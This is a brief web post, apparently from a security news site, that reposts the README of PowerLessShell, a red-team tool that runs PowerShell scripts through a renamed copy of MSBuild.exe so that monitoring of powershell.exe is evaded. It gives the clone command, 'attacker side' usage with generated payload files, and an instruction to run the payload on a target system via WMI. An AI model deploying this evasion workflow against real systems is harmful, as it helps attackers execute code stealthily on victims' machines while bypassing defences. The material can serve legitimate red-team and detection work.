by do son · Published · Updated
PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawing powershell.exe. To add another layer of crap the payload will copy msbuild.exe to something random and build the payload using the randomly generated binary.
git clone https://github.com/Mr-Un1k0d3r/PowerLessShell.gitAttacker side
$ python PowerLessShell.py
PowerLessShell - Remain Stealth
More PowerShell Less Powershell.exe - Mr.Un1k0d3r RingZer0 Team
___
.-"; ! ;"-.
.'! : | : !`.
/\ ! : ! : ! /\
/\ | ! :|: ! | /\
( \ \ ; :!: ; / / )
( `. \ | !:|:! | / .' )
(`. \ \ \!:|:!/ / / .')
\ `.`.\ |!|! |/,'.' /
`._`.\\!!!// .'_.'
`.`.\|//.'.'
|`._`n'_.'|
`----^----"
(Path to the PowerShell script)>>> powershell.ps1
(Path for the generated MsBuild out file)>>> payload.csproj
[+] payload.csproj was generated.
[+] payload.csproj.cmd was generated.
[+] Run the command inside of payload.csproj.cmd on the target system using WMI.Inline command
python PowerLessShell.py powershell.ps1 output
PowerLessShell - Remain Stealth
More PowerShell Less Powershell.exe - Mr.Un1k0d3r RingZer0 Team
___
.-"; ! ;"-.
.'! : | : !`.
/\ ! : ! : ! /\
/\ | ! :|: ! | /\
( \ \ ; :!: ; / / )
( `. \ | !:|:! | / .' )
(`. \ \ \!:|:!/ / / .')
\ `.`.\ |!|! |/,'.' /
`._`.\\!!!// .'_.'
`.`.\|//.'.'
|`._`n'_.'|
`----^----"
[+] output was generated.
[+] output.cmd was generated.
[+] Run the command inside of output.cmd on the target system using WMI.Source: Github
Tags: powerlessshellpowershell
Secure Your Connection
